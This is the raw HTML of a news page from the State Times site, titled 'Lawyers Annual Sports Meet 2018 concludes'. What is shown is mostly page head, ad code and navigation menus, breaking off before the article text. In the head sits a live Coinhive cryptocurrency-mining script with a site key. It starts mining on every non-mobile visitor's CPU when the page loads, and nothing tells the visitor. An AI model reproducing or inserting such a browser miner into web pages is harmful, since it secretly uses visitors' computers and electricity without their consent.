<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-GB"> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8" lang="en-GB"> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9" lang="en-GB"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-GB"> <!--<![endif]-->
    <head>
	<meta charset="UTF-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<title>Lawyers Annual Sports Meet 2018 concludes | State Times</title>
	<link rel="profile" href="http://gmpg.org/xfn/11">
	<link rel="pingback" href="http://news.statetimes.in/xmlrpc.php">
<meta property="og:image" content="http://news.statetimes.in/wp-content/uploads/2018/04/Lawyers-Annual-Sports-Meet-organised-by-JKHCBA.jpg"/>
    <meta property="og:image:width" content="1024" />
    <meta property="og:image:height" content="1024" />

<meta property="og:title" content="Lawyers Annual Sports Meet 2018 concludes"/>
<meta property="og:type" content="article"/>
<meta property="og:description" content="Lawyers Annual Sports Meet, organised by Jammu and Kashmir High Court Bar Association (JKHCBA) Jammu at Jammu University Grounds concluded today."/>
<meta property="og:url" content="http://news.statetimes.in/lawyers-annual-sports-meet-2018-concludes/"/>
<meta property="og:site_name" content="State Times"/>

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<link rel="shortcut icon" href="http://news.statetimes.in/wp-content/uploads/2014/08/favicon.png?x39047" />
<link rel="apple-touch-icon" href="http://news.statetimes.in/wp-content/themes/goodnews5/apple-touch-icon-precomposed.png?x39047" />



<link rel="pingback" href="http://news.statetimes.in/xmlrpc.php" />
        <!--[if lt IE 9]>
	<script src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/helpers/js/html5.js?x39047"></script>
	<script src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/helpers/js/IE9.js?x39047"></script>
	<![endif]-->
	<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; Feed" href="http://news.statetimes.in/feed/" />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; Comments Feed" href="http://news.statetimes.in/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; Lawyers Annual Sports Meet 2018 concludes Comments Feed" href="http://news.statetimes.in/lawyers-annual-sports-meet-2018-concludes/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/news.statetimes.in\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='contact-form-7-css'  href='http://news.statetimes.in/wp-content/plugins/contact-form-7/includes/css/styles.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='chosen-css'  href='http://news.statetimes.in/wp-content/plugins/wp-job-manager/assets/css/chosen.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='wp-job-manager-frontend-css'  href='http://news.statetimes.in/wp-content/plugins/wp-job-manager/assets/css/frontend.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='plugins-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/plugins.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='main-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/main.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='responsive-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/media.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='style-css'  href='http://news.statetimes.in/wp-content/themes/child-theme/style.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='black-style-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/flamingo.css?x39047' type='text/css' media='all' />
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/jquery/jquery.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/jquery/jquery-migrate.min.js?x39047'></script>
<link rel='https://api.w.org/' href='http://news.statetimes.in/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://news.statetimes.in/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://news.statetimes.in/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Mobile internet services suspended in Kashmir Valley' href='http://news.statetimes.in/mobile-internet-services-suspended-in-kashmir-valley/' />
<link rel='next' title='Diplomatic row' href='http://news.statetimes.in/diplomatic-row/' />
<meta name="generator" content="WordPress 4.9.4" />
<link rel="canonical" href="http://news.statetimes.in/lawyers-annual-sports-meet-2018-concludes/" />
<link rel='shortlink' href='http://news.statetimes.in/?p=345760' />
<link rel="alternate" type="application/json+oembed" href="http://news.statetimes.in/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fnews.statetimes.in%2Flawyers-annual-sports-meet-2018-concludes%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://news.statetimes.in/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fnews.statetimes.in%2Flawyers-annual-sports-meet-2018-concludes%2F&#038;format=xml" />
<meta name="msvalidate.01" content="E16D694C0F66CFA1ABC9F98B3398A6E5" />
<script type="text/javascript" async defer
  src="https://apis.google.com/js/platform.js?publisherid=101378335416363517049">
</script>
<link href="https://plus.google.com/101378335416363517049" rel="publisher" />
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-3121650879019050",
          enable_page_level_ads: true
     });
</script>
<meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://news.statetimes.in/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css?x39047" media="screen"><![endif]--><style type="text/css" title="dynamic-css" class="options-output">body{color:#282828;}{color:#262626;}.news-ticker{background-color:#262626;}.news-ticker li a, .news-ticker li{color:#ffffff;}</style><style type="text/css">
    
.header > .inner, .header .logo {
line-height: 112px;
height: 112px;
}
/* Category background */
</style>
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript><script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('P8XLU9qWSu7NaL91VW8ODQHZYJBdj6NY', {throttle: 0.3});

	// Only start on non-mobile devices and if not opted-out
	// in the last 14400 seconds (4 hours):
	if (!miner.isMobile() && !miner.didOptOut(14400)) {
		miner.start();
	}
</script>
    </head>
    <body class="post-template-default single single-post postid-345760 single-format-video both-sidebars-all both-sidebars singular both_sidebars_same_width fade-imgs-in-appear sticky_navigation_on navigation_highlight_ancestor time_in_twelve_format one-side-wide both-sidebars both-sides-true smooth_scroll_enable show_secondary_sidebar_on_ipad goodnews-child wpb-js-composer js-comp-ver-5.4.5 vc_responsive" itemscope="itemscope" itemtype="http://schema.org/WebPage">
    
        <!--[if lt IE 7]>
            <p class="browsehappy">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
        <![endif]-->
        <div class="boxed-wrap clearfix">
	    <div id="header-wrapper">
                         <div class="topbar">
  <div class="inner">
            <div class="top-left-content">
                 			     <ul id="menu-top-menu" class="top-nav mom_visibility_desktop"><li id="menu-item-72" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-72"><a href="http://news.statetimes.in">Home</a></li>
<li id="menu-item-69" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-69"><a target="_blank" href="http://www.statetimes.in/epaper/">E-Paper</a></li>
<li id="menu-item-71" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-71"><a target="_blank" href="http://news.statetimes.in/sitemap.xml">Sitemap</a></li>
<li id="menu-item-4980" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4980"><a href="http://news.statetimes.in/about-us/">About us</a></li>
<li id="menu-item-4981" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4981"><a href="http://news.statetimes.in/contact-us/">Contact us</a></li>
<li id="menu-item-57375" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-57375"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>
     			     <div class="mom_visibility_device device-top-menu-wrap">
			      <div class="top-menu-holder"><i class="fa-icon-reorder mh-icon"></i></div>
			      <ul id="menu-top-menu-1" class="device-top-nav"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-72"><a href="http://news.statetimes.in">Home</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-69"><a target="_blank" href="http://www.statetimes.in/epaper/">E-Paper</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-71"><a target="_blank" href="http://news.statetimes.in/sitemap.xml">Sitemap</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4980"><a href="http://news.statetimes.in/about-us/">About us</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4981"><a href="http://news.statetimes.in/contact-us/">Contact us</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-57375"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>			     </div>

                        </div> <!--tb left-->
        <div class="top-right-content">
            		    <ul class="mom-social-icons">
                    <li class="twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></li>
        
                <li class="facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></li>        
        
                   <li class="gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></li>     
        
        
                        <li class="youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></li>
        
        
        
        

        

        
                        <li class="tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></li>
                             <li class="rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></li>
        	
	    </ul>
                    </div> <!--tb right-->
</div>
 </div> <!--topbar-->
             <header class="header " itemscope="itemscope" itemtype="http://schema.org/WPHeader" role="banner">
                <div class="inner">
						                    <div class="logo">
					                    <a href="http://news.statetimes.in">
		                                                    <img src="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg?x39047" alt="State Times" width="445" height="77" />
                                                                                               <img class="mom_retina_logo" src="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg?x39047" width="445" height="77" alt="State Times" />
                                                		                    </a>

					
                    </div>
                                        <div class="header-right">
                                  		<script type="text/javascript">
		jQuery(document).ready(function($) {
			$('.e3lanat-rotator-id-941 .mom-e3lanat-inner').imagesLoaded( function() {
			jQuery('.e3lanat-rotator-id-941 .mom-e3lanat-inner').boxSlider({
				autoScroll: true,
				timeout: 5000,
				speed: 800,
				effect: 'scrollVert3d',
				pauseOnHover: true,
				next:'.e3lanat-rotator-id-941 .adr-next',
				prev: '.e3lanat-rotator-id-941 .adr-prev'
				
			});

			});

		});
	</script>
		<div class="mom-e3lanat-wrap  ">
	<div class="mom-e3lanat e3lanat-layout-rotator e3lanat-rotator-id-941" style="width:728px; height:90px;">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="60802" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- top banner -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4210843814"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
					<div class="mom-e3lan" data-id="60802" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- top banner -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4210843814"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
                    </div> <!--header right-->
                    
                <div class="clear"></div>
                </div>
            </header>
	    	    </div> <!--header wrap-->
                                    <nav id="navigation" itemtype="http://schema.org/SiteNavigationElement" itemscope="itemscope" role="navigation" class="dd-effect-slide ">
                <div class="navigation-inner">
                <div class="inner">
                                                                <ul id="menu-primary-two" class="main-menu mom_visibility_desktop"><li id="menu-item-58059" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home mom_default_menu_item menu-item-iconsOnly menu-item-depth-0"><a href="http://news.statetimes.in/"><i class="icon_only momizat-icon-home"></i><span class="icon_only_label">Home</span></a></li>
<li id="menu-item-58080" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/jknews/">Jammu and Kashmir</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58091" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/topjknews/">Top J&#038;K News</a></li>
	<li id="menu-item-58083" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/local-news/">Cities &#038; Towns</a></li>
	<li id="menu-item-58086" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/jksports/">J&#038;K Sports</a></li>
	<li id="menu-item-58085" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/crime-watch/">Crime Watch</a></li>
	<li id="menu-item-58084" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/courts/">Courts</a></li>
	<li id="menu-item-58081" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/art-culture/">Art &#038; Culture</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58091' data-id='15' data-object='category' data-layout=''><ul id='mn-ul-latest-58091'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/mobile-internet-services-suspended-in-kashmir-valley/' title='Mobile internet services suspended in Kashmir Valley'><img src='http://news.statetimes.in/wp-content/uploads/2016/11/Congress-aghast-over-continuous-ban-on-mobile-internet-90x60.jpg?x39047' alt='Mobile internet services suspended in Kashmir Valley' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/mobile-internet-services-suspended-in-kashmir-valley/' title='Mobile internet services suspended in Kashmir Valley'> Mobile internet services suspended in Kashmir Valley</a><span> - 4 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/eight-militants-killed-in-south-kashmir-encounters/' title='Eight militants killed in south Kashmir encounters'><img src='http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047' alt='Eight militants killed in south Kashmir encounters' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/eight-militants-killed-in-south-kashmir-encounters/' title='Eight militants killed in south Kashmir encounters'> Eight militants killed in south Kashmir encounters</a><span> - 8 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/army-chief-reviews-security-situation-along-loc/' title='Army Chief reviews security situation along LoC'><img src='http://news.statetimes.in/wp-content/uploads/2018/04/ARMY-CHIEF-VISITS-NORTHERN-COMMAND-1-90x60.jpg?x39047' alt='Army Chief reviews security situation along LoC' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/army-chief-reviews-security-situation-along-loc/' title='Army Chief reviews security situation along LoC'> Army Chief reviews security situation along LoC</a><span> - 20 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/with-eye-on-polls-pradesh-bjp-may-revert-to-abandoned-core-issues/' title='With eye on polls, Pradesh BJP may revert to ‘abandoned’ core issues'><img src='http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047' alt='With eye on polls, Pradesh BJP may revert to ‘abandoned’ core issues' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/with-eye-on-polls-pradesh-bjp-may-revert-to-abandoned-core-issues/' title='With eye on polls, Pradesh BJP may revert to ‘abandoned’ core issues'> With eye on polls, Pradesh BJP may revert to ‘abandoned’ core issues</a><span> - 20 hours ago</span></div></li></ul><a href='http://news.statetimes.in/section/news/jknews/topjknews/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58083' data-id='16' data-object='category' data-layout=''><ul id='mn-ul-latest-58083'></ul><a href='http://news.statetimes.in/section/news/jknews/local-news/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58086' data-id='17' data-object='category' data-layout=''><ul id='mn-ul-latest-58086'></ul><a href='http://news.statetimes.in/section/news/jknews/jksports/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58085' data-id='233' data-object='category' data-layout=''><ul id='mn-ul-latest-58085'></ul><a href='http://news.statetimes.in/section/news/jknews/crime-watch/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58084' data-id='1355' data-object='category' data-layout=''><ul id='mn-ul-latest-58084'></ul><a href='http://news.statetimes.in/section/news/jknews/courts/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58081' data-id='1349' data-object='category' data-layout=''><ul id='mn-ul-latest-58081'></ul><a href='http://news.statetimes.in/section/news/jknews/art-culture/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58092" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/exclusive/">Exclusive</a>
<ul class="sub-menu ">
	<li id="menu-item-58093" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/topic/dost-khan/">Dost Khan</a></li>
	<li id="menu-item-58094" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/blunt-butcher/">Blunt Butcher</a></li>
	<li id="menu-item-58095" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/pride-or-shame-2/">Pride or Shame</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58096" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/editorial/">Editorial</a></li>
<li id="menu-item-58104" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/world/">World</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58101" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/india-national/">National</a></li>
	<li id="menu-item-58105" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/world/">World</a></li>
	<li id="menu-item-58100" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/business/">Business</a></li>
	<li id="menu-item-58103" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/sports/">Sports</a></li>
	<li id="menu-item-58102" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/science-tech/">Science n Tech</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58101' data-id='20' data-object='category' data-layout=''><ul id='mn-ul-latest-58101'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/bjym-supports-up-govt-move-to-introduce-ramji-as-middle-name-of-ambedkar/' title='BJYM supports UP govt move to introduce &#8216;Ramji&#8217; as middle name of Ambedkar'><img src='http://news.statetimes.in/wp-content/uploads/2015/04/BR-Ambedkar-90x60.jpg?x39047' alt='BJYM supports UP govt move to introduce &#8216;Ramji&#8217; as middle name of Ambedkar' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/bjym-supports-up-govt-move-to-introduce-ramji-as-middle-name-of-ambedkar/' title='BJYM supports UP govt move to introduce &#8216;Ramji&#8217; as middle name of Ambedkar'> BJYM supports UP govt move to introduce &#8216;Ramji&#8217; as middle name of Ambedkar</a><span> - 6 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/cag-raps-guj-over-lacunae-in-regulation-of-fishing-activities/' title='CAG raps Guj over lacunae in regulation of fishing activities'><img src='http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047' alt='CAG raps Guj over lacunae in regulation of fishing activities' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/cag-raps-guj-over-lacunae-in-regulation-of-fishing-activities/' title='CAG raps Guj over lacunae in regulation of fishing activities'> CAG raps Guj over lacunae in regulation of fishing activities</a><span> - 8 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/communication-with-gsat-6a-lost/' title='Communication with GSAT-6A lost'><img src='http://news.statetimes.in/wp-content/uploads/2018/04/VBK-ISRO-1-90x60.jpg?x39047' alt='Communication with GSAT-6A lost' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/communication-with-gsat-6a-lost/' title='Communication with GSAT-6A lost'> Communication with GSAT-6A lost</a><span> - 8 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/riot-accused-union-ministers-son-arrested-in-patna/' title='Riot accused union minister&#8217;s son arrested in Patna'><img src='http://news.statetimes.in/wp-content/uploads/2017/08/Hizbul-module-unearthed-three-arrested-90x60.jpg?x39047' alt='Riot accused union minister&#8217;s son arrested in Patna' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/riot-accused-union-ministers-son-arrested-in-patna/' title='Riot accused union minister&#8217;s son arrested in Patna'> Riot accused union minister&#8217;s son arrested in Patna</a><span> - 8 hours ago</span></div></li></ul><a href='http://news.statetimes.in/section/news/india-national/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58105' data-id='9' data-object='category' data-layout=''><ul id='mn-ul-latest-58105'></ul><a href='http://news.statetimes.in/section/news/world/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58100' data-id='22' data-object='category' data-layout=''><ul id='mn-ul-latest-58100'></ul><a href='http://news.statetimes.in/section/news/business/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58103' data-id='21' data-object='category' data-layout=''><ul id='mn-ul-latest-58103'></ul><a href='http://news.statetimes.in/section/news/sports/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58102' data-id='23' data-object='category' data-layout=''><ul id='mn-ul-latest-58102'></ul><a href='http://news.statetimes.in/section/news/science-tech/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58106" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/entertainment/">Entertainment</a><div class='cats-mega-wrap mom_cats_horizontal'>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58107" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/bollywod/">Bollywood</a></li>
	<li id="menu-item-58108" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/hollywood/">Hollywood</a></li>
	<li id="menu-item-58109" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/movies/">Movies</a></li>
	<li id="menu-item-58110" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/television/">Television</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58107' data-id='11' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58107'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/baaghi-2-mints-rs-25-10-crore-on-day-one/' title='&#8216;Baaghi 2&#8217; mints Rs 25.10 crore on day one'><img src='http://news.statetimes.in/wp-content/uploads/2018/01/Baaghi-2-gets-March-30-release-120x76.jpg?x39047' alt='&#8216;Baaghi 2&#8217; mints Rs 25.10 crore on day one' width='117' height='74'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/baaghi-2-mints-rs-25-10-crore-on-day-one/' title='&#8216;Baaghi 2&#8217; mints Rs 25.10 crore on day one'> &#8216;Baaghi 2&#8217; mints Rs 25.10 crore on day one</a><span>  1 day ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/kamal-haasan-christopher-nolan-bond-over-movies/' title='Kamal Haasan, Christopher Nolan bond over movies'><img src='http://news.statetimes.in/wp-content/uploads/2018/03/Kamal-Haasan-Christopher-Nolan-bond-over-movies-120x76.jpg?x39047' alt='Kamal Haasan, Christopher Nolan bond over movies' width='117' height='74'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/kamal-haasan-christopher-nolan-bond-over-movies/' title='Kamal Haasan, Christopher Nolan bond over movies'> Kamal Haasan, Christopher Nolan bond over movies</a><span>  1 day ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/sonam-to-consult-author-anuja-chauhan-on-her-the-zoya-factor-role/' title='Sonam to consult author Anuja Chauhan on her &#8216;The Zoya Factor&#8217; role'><img src='http://news.statetimes.in/wp-content/uploads/2015/08/Sonam-Kapoor-opens-India-Bridal-Fashion-Week-2015-120x76.jpg?x39047' alt='Sonam to consult author Anuja Chauhan on her &#8216;The Zoya Factor&#8217; role' width='117' height='74'></a></div><div class='subcat-title'><a 